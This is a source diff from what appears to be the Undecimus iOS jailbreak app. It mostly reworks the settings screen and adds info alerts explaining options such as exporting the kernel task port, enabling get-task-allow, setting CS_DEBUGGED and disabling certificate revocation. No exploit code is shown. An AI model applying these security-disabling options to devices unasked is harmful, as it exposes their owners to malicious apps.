-    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(voucher_swap_exploit) forSegmentAtIndex:voucher_swap_exploit];
-    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(mach_swap_exploit) forSegmentAtIndex:mach_swap_exploit];
-    [self.KernelExploitSegmentedControl setEnabled:supportsExploit(mach_swap_2_exploit) forSegmentAtIndex:mach_swap_2_exploit];
-    [self.OpenCydiaButton setEnabled:(BOOL)cydiaIsInstalled()];
-    [self.ExpiryLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)[[SettingsTableViewController provisioningProfileAtPath:[[NSBundle mainBundle] pathForResource:@"embedded" ofType:@"mobileprovision"]][@"ExpirationDate"] timeIntervalSinceDate:[NSDate date]] / 86400, localize(@"Days")]];
-    [self.OverwriteBootNonceSwitch setOn:(BOOL)prefs->overwrite_boot_nonce];
-    [self.ExportKernelTaskPortSwitch setOn:(BOOL)prefs->export_kernel_task_port];
-    [self.RestoreRootFSSwitch setOn:(BOOL)prefs->restore_rootfs];
-    [self.UptimeLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)getUptime() / 86400, localize(@"Days")]];
-    [self.IncreaseMemoryLimitSwitch setOn:(BOOL)prefs->increase_memory_limit];
+    [self.tweakInjectionSwitch setOn:(BOOL)prefs->load_tweaks];
+    [self.loadDaemonsSwitch setOn:(BOOL)prefs->load_daemons];
+    [self.dumpAPTicketSwitch setOn:(BOOL)prefs->dump_apticket];
+    [self.bootNonceTextField setPlaceholder:@(prefs->boot_nonce)];
+    [self.bootNonceTextField setText:nil];
+    [self.refreshIconCacheSwitch setOn:(BOOL)prefs->run_uicache];
+    [self.disableAutoUpdatesSwitch setOn:(BOOL)prefs->disable_auto_updates];
+    [self.disableAppRevokesSwitch setOn:(BOOL)prefs->disable_app_revokes];
+    [self.kernelExploitTextField setText:nil];
+    @try {
+        [self.kernelExploitTextField setPlaceholder:[_exploitPickerArray objectAtIndex:(int)prefs->exploit]];
+    } @catch (__unused NSException *exception) {
+        [self.kernelExploitTextField setPlaceholder:localize(@"Unavailable")];
+        [self.kernelExploitTextField setEnabled:NO];
+    }
+    [self.codeSubstitutorTextField setText:nil];
+    @try {
+        [self.codeSubstitutorTextField setPlaceholder:[_substitutorPickerArray objectAtIndex:(int)prefs->code_substitutor]];
+    } @catch (__unused NSException *exception) {
+        [self.codeSubstitutorTextField setPlaceholder:localize(@"Unavailable")];
+        [self.codeSubstitutorTextField setEnabled:NO];
+    }
+    [self.openCydiaButton setEnabled:(BOOL)cydiaIsInstalled()];
+    [self.expiryLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)[[SettingsTableViewController provisioningProfileAtPath:[[NSBundle mainBundle] pathForResource:@"embedded" ofType:@"mobileprovision"]][@"ExpirationDate"] timeIntervalSinceDate:[NSDate date]] / 86400, localize(@"Days")]];
+    [self.overwriteBootNonceSwitch setOn:(BOOL)prefs->overwrite_boot_nonce];
+    [self.exportKernelTaskPortSwitch setOn:(BOOL)prefs->export_kernel_task_port];
+    [self.restoreRootFSSwitch setOn:(BOOL)prefs->restore_rootfs];
+    [self.uptimeLabel setPlaceholder:[NSString stringWithFormat:@"%d %@", (int)getUptime() / 86400, localize(@"Days")]];
+    [self.increaseMemoryLimitSwitch setOn:(BOOL)prefs->increase_memory_limit];
     [self.installSSHSwitch setOn:(BOOL)prefs->install_openssh];
     [self.installCydiaSwitch setOn:(BOOL)prefs->install_cydia];
-    if (prefs->ecid) [self.ECIDLabel setPlaceholder:hexFromInt([@(prefs->ecid) integerValue])];
-    [self.ReloadSystemDaemonsSwitch setOn:(BOOL)prefs->reload_system_daemons];
-    [self.HideLogWindowSwitch setOn:(BOOL)prefs->hide_log_window];
-    [self.ResetCydiaCacheSwitch setOn:(BOOL)prefs->reset_cydia_cache];
-    [self.SSHOnlySwitch setOn:(BOOL)prefs->ssh_only];
-    [self.EnableGetTaskAllowSwitch setOn:(BOOL)prefs->enable_get_task_allow];
-    [self.SetCSDebuggedSwitch setOn:(BOOL)prefs->set_cs_debugged];
-    [self.RestartSpringBoardButton setEnabled:respringSupported()];
+    if (prefs->ecid) [self.ecidLabel setPlaceholder:hexFromInt([@(prefs->ecid) integerValue])];
+    [self.reloadSystemDaemonsSwitch setOn:(BOOL)prefs->reload_system_daemons];
+    [self.hideLogWindowSwitch setOn:(BOOL)prefs->hide_log_window];
+    [self.resetCydiaCacheSwitch setOn:(BOOL)prefs->reset_cydia_cache];
+    [self.sshOnlySwitch setOn:(BOOL)prefs->ssh_only];
+    [self.enableGetTaskAllowSwitch setOn:(BOOL)prefs->enable_get_task_allow];
+    [self.setCSDebuggedSwitch setOn:(BOOL)prefs->set_cs_debugged];
+    [self.autoRespringSwitch setOn:(BOOL)prefs->auto_respring];
+    [self.restartSpringBoardButton setEnabled:respringSupported()];
     [self.restartButton setEnabled:restartSupported()];
     release_prefs(&prefs);
+    [JailbreakViewController.sharedController updateStatus];
     [self.tableView reloadData];
 }
 
-- (IBAction)TweakInjectionSwitchTriggered:(id)sender {
+- (void)tableView:(UITableView *)tableView didSelectRowAtIndexPath:(NSIndexPath *)indexPath {
+    
+    if (indexPath.row == 0) {
+        [[NSNotificationCenter defaultCenter] postNotificationName:@"showSpecialThanks" object:self];
+    }
+    
+    [tableView deselectRowAtIndexPath:indexPath animated:YES];
+}
+
+- (IBAction)selectedSpecialThanks:(id)sender {
+    
+    [[NSNotificationCenter defaultCenter] postNotificationName:@"showSpecialThanks" object:self];
+}
+
+- (IBAction)tweakInjectionSwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->load_tweaks = (bool)self.TweakInjectionSwitch.isOn;
+    prefs->load_tweaks = (bool)self.tweakInjectionSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)LoadDaemonsSwitchTriggered:(id)sender {
+- (IBAction)loadDaemonsSwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->load_daemons = (bool)self.LoadDaemonsSwitch.isOn;
+    prefs->load_daemons = (bool)self.loadDaemonsSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)DumpAPTicketSwitchTriggered:(id)sender {
+- (IBAction)dumpAPTicketSwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->dump_apticket = (bool)self.DumpAPTicketSwitch.isOn;
+    prefs->dump_apticket = (bool)self.dumpAPTicketSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)BootNonceTextFieldTriggered:(id)sender {
+- (IBAction)bootNonceTextFieldEditingDidEnd:(id)sender {
     uint64_t val = 0;
-    if ([[NSScanner scannerWithString:[self.BootNonceTextField text]] scanHexLongLong:&val] && val != HUGE_VAL && val != -HUGE_VAL) {
+    if ([[NSScanner scannerWithString:[self.bootNonceTextField text]] scanHexLongLong:&val] && val != HUGE_VAL && val != -HUGE_VAL) {
         prefs_t *prefs = copy_prefs();
         prefs->boot_nonce = [NSString stringWithFormat:@ADDR, val].UTF8String;
         set_prefs(prefs);
@@ -150,25 +307,82 @@
     [self reloadData];
 }
 
-- (IBAction)RefreshIconCacheSwitchTriggered:(id)sender {
+- (IBAction)refreshIconCacheSwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->run_uicache = (bool)self.RefreshIconCacheSwitch.isOn;
+    prefs->run_uicache = (bool)self.refreshIconCacheSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)KernelExploitSegmentedControl:(id)sender {
+- (NSInteger)numberOfComponentsInPickerView:(UIPickerView *)pickerView {
+    return 1;
+}
+
+- (NSInteger)pickerView:(UIPickerView *)pickerView numberOfRowsInComponent:(NSInteger)component {
+    NSInteger count = 0;
+    if (pickerView == _kernelExploitPickerView) {
+        count = [self.availableExploits count];
+    } else if (pickerView == _codeSubstitutorPickerView) {
+        count = [self.availableSubstitutors count];
+    }
+    return count;
+}
+
+- (NSString *)pickerView:(UIPickerView *)pickerView titleForRow:(NSInteger)row forComponent:(NSInteger)component {
+    NSString *title = nil;
+    if (pickerView == _kernelExploitPickerView) {
+        title = [[self.availableExploits allKeys] objectAtIndex:row];
+    } else if (pickerView == _codeSubstitutorPickerView) {
+        title = [[self.availableSubstitutors allKeys] objectAtIndex:row];
+    }
+    return title;
+}
+
+- (NSAttributedString *)pickerView:(UIPickerView *)pickerView attributedTitleForRow:(NSInteger)row forComponent:(NSInteger)component {
+    NSString *title = nil;
+    if (pickerView == _kernelExploitPickerView) {
+        title = [self.availableExploits.allKeys objectAtIndex:row];
+    } else if (pickerView == _codeSubstitutorPickerView) {
+        title = [self.availableSubstitutors.allKeys objectAtIndex:row];
+    }
+    if (title == nil) {
+        return nil;
+    }
     prefs_t *prefs = copy_prefs();
-    prefs->exploit = (int)self.KernelExploitSegmentedControl.selectedSegmentIndex;
+    NSDictionary *attributes = @{NSForegroundColorAttributeName : prefs->dark_mode ? [UIColor whiteColor] : [UIColor blackColor] };
+    release_prefs(&prefs);
+    NSAttributedString *attributedString = [[NSAttributedString alloc] initWithString:title attributes:attributes];
+    return attributedString;
+}
+
+- (void)pickerView:(UIPickerView *)pickerView didSelectRow:(NSInteger)row inComponent:(NSInteger)component {
+    self.isPicking = YES;
+}
+
+- (void)exploitPickerDoneAction {
+    self.isPicking = NO;
+    prefs_t *prefs = copy_prefs();
+    prefs->exploit = [[_availableExploits objectForKey:[[_availableExploits allKeys] objectAtIndex:[[self kernelExploitPickerView] selectedRowInComponent:0]]] intValue];
     set_prefs(prefs);
     release_prefs(&prefs);
+    [[self kernelExploitTextField] resignFirstResponder];
     [self reloadData];
 }
 
-- (IBAction)DisableAppRevokesSwitchTriggered:(id)sender {
+- (void)substitutorPickerDoneAction {
+    self.isPicking = NO;
     prefs_t *prefs = copy_prefs();
-    prefs->disable_app_revokes = (bool)self.DisableAppRevokesSwitch.isOn;
+    prefs->code_substitutor = [[_availableSubstitutors objectForKey:[[_availableSubstitutors allKeys] objectAtIndex:[[self codeSubstitutorPickerView] selectedRowInComponent:0]]] intValue];
+    set_prefs(prefs);
+    release_prefs(&prefs);
+    [[self codeSubstitutorTextField] resignFirstResponder];
+    [self reloadData];
+}
+
+- (IBAction)disableAppRevokesSwitchValueChanged:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->disable_app_revokes = (bool)self.disableAppRevokesSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
@@ -199,9 +413,9 @@
     dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
 }
 
-- (IBAction)DisableAutoUpdatesSwitchTriggered:(id)sender {
+- (IBAction)disableAutoUpdatesSwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->disable_auto_updates = (bool)self.DisableAutoUpdatesSwitch.isOn;
+    prefs->disable_auto_updates = (bool)self.disableAutoUpdatesSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
@@ -212,7 +426,7 @@
     [getDiagnostics() writeToURL:URL error:nil];
     UIActivityViewController *const activityViewController = [[UIActivityViewController alloc] initWithActivityItems:@[URL] applicationActivities:nil];
     if ([activityViewController respondsToSelector:@selector(popoverPresentationController)]) {
-        [[activityViewController popoverPresentationController] setSourceView:self.ShareDiagnosticsDataButton];
+        [[activityViewController popoverPresentationController] setSourceView:self.shareDiagnosticsDataButton];
     }
     [self presentViewController:activityViewController animated:YES completion:nil];
 }
@@ -225,9 +439,9 @@
     [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"https://github.com/pwn20wndstuff/Undecimus"] options:@{} completionHandler:nil];
 }
 
-- (IBAction)OverwriteBootNonceSwitchTriggered:(id)sender {
+- (IBAction)overwriteBootNonceSwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->overwrite_boot_nonce = (bool)self.OverwriteBootNonceSwitch.isOn;
+    prefs->overwrite_boot_nonce = (bool)self.overwriteBootNonceSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
@@ -247,7 +461,7 @@
 }
 
 - (IBAction)tappedOnCopyECID:(id)sender {
-    UIAlertController *const copyBootNonceAlert = [UIAlertController alertControllerWithTitle:localize(@"Copy ECID?") message:localize(@"Would you like to ECID to clipboard?") preferredStyle:UIAlertControllerStyleAlert];
+    UIAlertController *const copyBootNonceAlert = [UIAlertController alertControllerWithTitle:localize(@"Copy ECID?") message:localize(@"Would you like to copy ECID to clipboard?") preferredStyle:UIAlertControllerStyleAlert];
     UIAlertAction *const copyAction = [UIAlertAction actionWithTitle:localize(@"Yes") style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
         prefs_t *prefs = copy_prefs();
         [[UIPasteboard generalPasteboard] setString:hexFromInt(@(prefs->ecid).integerValue)];
@@ -273,23 +487,23 @@
     dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
 }
 
-- (IBAction)exportKernelTaskPortSwitchTriggered:(id)sender {
+- (IBAction)exportKernelTaskPortSwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->export_kernel_task_port = (bool)self.ExportKernelTaskPortSwitch.isOn;
+    prefs->export_kernel_task_port = (bool)self.exportKernelTaskPortSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)RestoreRootFSSwitchTriggered:(id)sender {
+- (IBAction)restoreRootFSSwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->restore_rootfs = (bool)self.RestoreRootFSSwitch.isOn;
+    prefs->restore_rootfs = (bool)self.restoreRootFSSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)installCydiaSwitchTriggered:(id)sender {
+- (IBAction)installCydiaSwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
     prefs->install_cydia = (bool)self.installCydiaSwitch.isOn;
     set_prefs(prefs);
@@ -297,7 +511,7 @@
     [self reloadData];
 }
 
-- (IBAction)installSSHSwitchTriggered:(id)sender {
+- (IBAction)installSSHSwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
     prefs->install_openssh = (bool)self.installSSHSwitch.isOn;
     set_prefs(prefs);
@@ -310,9 +524,9 @@
     footerView.textLabel.textAlignment = NSTextAlignmentCenter;
 }
 
-- (IBAction)IncreaseMemoryLimitSwitch:(id)sender {
+- (IBAction)increaseMemoryLimitSwitch:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->increase_memory_limit = (bool)self.IncreaseMemoryLimitSwitch.isOn;
+    prefs->increase_memory_limit = (bool)self.increaseMemoryLimitSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
@@ -326,9 +540,9 @@
     [self reloadData];
 }
 
-- (IBAction)reloadSystemDaemonsSwitchTriggered:(id)sender {
+- (IBAction)reloadSystemDaemonsSwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->reload_system_daemons = (bool)self.ReloadSystemDaemonsSwitch.isOn;
+    prefs->reload_system_daemons = (bool)self.reloadSystemDaemonsSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
@@ -358,9 +572,9 @@
     notice(localize(@"Cleaned diagnostics data."), false, false);
 }
 
-- (IBAction)hideLogWindowSwitchTriggered:(id)sender {
+- (IBAction)hideLogWindowSwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->hide_log_window = (bool)self.HideLogWindowSwitch.isOn;
+    prefs->hide_log_window = (bool)self.hideLogWindowSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
@@ -371,25 +585,25 @@
     dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
 }
 
-- (IBAction)resetCydiaCacheSwitchTriggered:(id)sender {
+- (IBAction)resetCydiaCacheSwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->reset_cydia_cache = (bool)self.ResetCydiaCacheSwitch.isOn;
+    prefs->reset_cydia_cache = (bool)self.resetCydiaCacheSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)sshOnlySwitchTriggered:(id)sender {
+- (IBAction)sshOnlySwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->ssh_only = (bool)self.SSHOnlySwitch.isOn;
+    prefs->ssh_only = (bool)self.sshOnlySwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
 }
 
-- (IBAction)enableGetTaskAllowSwitchTriggered:(id)sender {
+- (IBAction)enableGetTaskAllowSwitchValueChanged:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->enable_get_task_allow = (bool)self.EnableGetTaskAllowSwitch.isOn;
+    prefs->enable_get_task_allow = (bool)self.enableGetTaskAllowSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
@@ -397,7 +611,15 @@
 
 - (IBAction)setCSDebugged:(id)sender {
     prefs_t *prefs = copy_prefs();
-    prefs->set_cs_debugged = (bool)self.SetCSDebuggedSwitch.isOn;
+    prefs->set_cs_debugged = (bool)self.setCSDebuggedSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
+    [self reloadData];
+}
+
+- (IBAction)setAutoRespring:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->auto_respring = (bool)self.autoRespringSwitch.isOn;
     set_prefs(prefs);
     release_prefs(&prefs);
     [self reloadData];
@@ -412,6 +634,264 @@
     dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
 }
 
+- (IBAction)tappedOnLoadTweaksInfoButton:(id)sender {
+    showAlert(localize(@"Load Tweaks"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes Substrate load extensions that are commonly referred to as tweaks in newly started processes."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnLoadDaemonsInfoButton:(id)sender {
+    showAlert(localize(@"Load Daemons"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak load the launch daemons located at /Library/LaunchDaemons and execute files located at /etc/rc.d."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnDumpAPTicketInfoButton:(id)sender {
+    showAlert(localize(@"Dump APTicket"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak create a copy of the system APTicket located at /System/Library/Caches/apticket.der at its Documents directory which is accessible via iTunes File Sharing."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnRefreshIconCacheInfoButton:(id)sender {
+    showAlert(localize(@"Refresh Icon Cache"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak regenerate SpringBoard's system application installation cache to cause newly installed .app bundles to appear on the icon list."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnDisableAutoUpdatesInfoButton:(id)sender {
+    showAlert(localize(@"Disable Updates"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak effectively disable the system's software update mechanism to prevent the system from automatically upgrading to the latest available firmware which may not be supported by the jailbreak at that time."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnDisableAppRevokesInfoButton:(id)sender {
+    showAlert(localize(@"Disable Revokes"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak effectively disable the system's online certificate status protocol system to prevent enterprise certificates which the jailbreak may be signed with from getting revoked."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-11.4.1 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnOverwriteBootNonceInfoButton:(id)sender {
+    showAlert(localize(@"Set Boot Nonce"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak set the persistent com.apple.System.boot-nonce variable in non-volatile random-access memory (NVRAM) which may be required to downgrade to an unsigned iOS firmware by using SHSH files."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnExportKernelTaskPortInfoButton:(id)sender {
+    showAlert(localize(@"Export TFP0"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak modify the host-port to grant any process access to the host-priv-port."
+                       "\n"
+                       "This option effectively grants any process access to the kernel task port (TFP0) and allows re-jailbreaking without exploiting again."
+                       "\n"
+                       "This option is considered unsafe as the privilege this option effectively grants to processes can be used for bad purposes by malicous apps."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnRestoreRootFSInfoButton:(id)sender {
+    showAlert(localize(@"Restore RootFS"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak restore the root filesystem (RootFS) to the snapshot which is created by the system when the device is restored."
+                       "\n"
+                       "This option effectively allows uninstalling the jailbreak without losing any user data."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnIncreaseMemoryLimitInfoButton:(id)sender {
+    showAlert(localize(@"Max Memory Limit"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak modify the Jetsam configuration file to increase the memory limit that is enforced upon processes by Jetsam to the maximum value to effectively bypass that mechanism."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnInstallSSHInfoButton:(id)sender {
+    showAlert(localize(@"(Re)Install OpenSSH"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak (re)install the openssh package."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnInstallCydiaInfoButton:(id)sender {
+    showAlert(localize(@"Reinstall Cydia"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes jailbreak reinstall the cydiainstaller package."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnReloadSystemDaemonsInfoButton:(id)sender {
+    showAlert(localize(@"Reload Daemons"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak reload all of the running system daemons to make the Substrate extensions (tweaks) load in them."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnHideLogWindowInfoButton:(id)sender {
+    showAlert(localize(@"Hide Log Window"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option hides the log window or console in the jailbreak app for a more clean look."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnResetCydiaCacheInfoButton:(id)sender {
+    showAlert(localize(@"Reset Cydia Cache"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak reset Cydia's cache."
+                       "\n"
+                       "This option will cause Cydia to regenerate the repo lists and its cache."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnSSHOnlyInfoButton:(id)sender {
+    showAlert(localize(@"SSH Only"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak skip installing Cydia and Substrate."
+                       "\n"
+                       "This option starts SSH on 127.0.0.1 (localhost) on port 22 via dropbear."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64/arm64e SoCs (A7-A12X)."),
+              false,
+              false);
+}
+
+- (IBAction)tappedOnEnableGetTaskAllowInfoButton:(id)sender {
+    showAlert(localize(@"Set get-task-allow"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak dynamically enable the get-task-allow entitlement for every new process."
+                       "\n"
+                       "This option makes dyld treat the processes unrestricted."
+                       "\n"
+                       "This option enables dyld environment variables such as DYLD_INSERT_LIBRARIES."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+- (IBAction)tappedOnCSDebuggedInfoButton:(id)sender {
+    showAlert(localize(@"Set CS_DEBUGGED"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak dynamically set the CS_DEBUGGED codesign flag for every new process."
+                       "\n"
+                       "This option makes the kernel allow processes to run with invalid executable pages."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+- (IBAction)tappedOnAutoRespringInfoButton:(id)sender {
+    showAlert(localize(@"Auto Respring"),
+              localize(@"Description:"
+                       "\n\n"
+                       "This option makes the jailbreak automatically restart the SpringBoard as soon as the jailbreak process is completed without the confirmation."
+                       "\n\n"
+                       "Compatibility:"
+                       "\n\n"
+                       "iOS 11.0-12.1.2 on arm64 SoCs (A7-A11)."),
+              false,
+              false);
+}
+
+
 - (CGFloat)tableView:(UITableView *)tableView heightForRowAtIndexPath:(NSIndexPath *)indexPath {
     return 44;
 }

Undecimus/source/jailbreak.m

@@ -36,6 +36,7 @@
 #import <patchfinder64.h>
 #import <offsetcache.h>
 #import <kerneldec.h>
+#include <pwd.h>
 #import "JailbreakViewController.h"
 #include "KernelOffsets.h"
 #include "empty_list_sploit.h"
@@ -62,11 +63,20 @@
 int stage = __COUNTER__;
 extern int maxStage;
 
-#define status_with_stage(Stage, MaxStage) status(([NSString stringWithFormat:@"%@ (%d/%d)", localize(@"Exploiting"), Stage, MaxStage]), false, false)
+#define update_stage() do { \
+    dispatch_async(dispatch_get_main_queue(), ^{ \
+        [UIView performWithoutAnimation:^{ \
+            [[[JailbreakViewController sharedController] jailbreakProgressBar] setProgress:(float)((float) stage/ (float) maxStage) animated:YES]; \
+            [[[JailbreakViewController sharedController] jailbreakProgressBar] setProgress:(float)((float) stage/ (float) maxStage) animated:YES]; \
+            [[JailbreakViewController sharedController] exploitProgressLabel].text = [NSString stringWithFormat:@"%d/%d", stage, maxStage]; \
+        }]; \
+    }); \
+} while (false)
+
 #define upstage() do { \
     __COUNTER__; \
     stage++; \
-    status_with_stage(stage, maxStage); \
+    update_stage(); \
 } while (false)
 
 #define find_offset(x, symbol, critical) do { \
@@ -92,10 +102,12 @@ extern int maxStage;
 
 void jailbreak()
 {
+    status(localize(@"Jailbreaking"), false, false);
+    
     int rv = 0;
     bool usedPersistedKernelTaskPort = NO;
-    pid_t const myPid = getpid();
-    uid_t const myUid = getuid();
+    pid_t const my_pid = getpid();
+    uid_t const my_uid = getuid();
     host_t myHost = HOST_NULL;
     host_t myOriginalHost = HOST_NULL;
     kptr_t myProcAddr = KPTR_NULL;
@@ -105,21 +117,32 @@ void jailbreak()
     kptr_t Shenanigans = KPTR_NULL;
     prefs_t *prefs = copy_prefs();
     bool needStrap = NO;
-    bool needSubstrate = NO;
-    bool skipSubstrate = NO;
+    bool needSubstitutor = NO;
+    bool skipSubstitutor = NO;
     NSString *const homeDirectory = NSHomeDirectory();
+    NSString *const temporaryDirectory = NSTemporaryDirectory();
     NSMutableArray *debsToInstall = [NSMutableArray new];
     NSMutableString *status = [NSMutableString new];
     bool const betaFirmware = isBetaFirmware();
     time_t const start_time = time(NULL);
-    UIProgressHUD *hud = addProgressHUD();
     JailbreakViewController *sharedController = [JailbreakViewController sharedController];
     NSMutableArray *resources = [NSMutableArray new];
+    NSFileManager *const fileManager = [NSFileManager defaultManager];
+    bool const doInject = (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0);
+    const char *success_file = [temporaryDirectory stringByAppendingPathComponent:@"jailbreak.completed"].UTF8String;
+    NSString *const NSJailbreakDirectory = @"/jb";
+    const char *jailbreakDirectory = NSJailbreakDirectory.UTF8String;
+    struct passwd *const root_pw = getpwnam("root");
+    struct passwd *const mobile_pw = getpwnam("mobile");
+    substitutor_info_t *substitutor = NULL;
+    _assert(my_uid == mobile_pw->pw_uid, localize(@"Unable to verify my user id."), true);
+#define NSJailbreakFile(x) ([NSJailbreakDirectory stringByAppendingPathComponent:x])
+#define jailbreak_file(x) (NSJailbreakFile(@(x)).UTF8String)
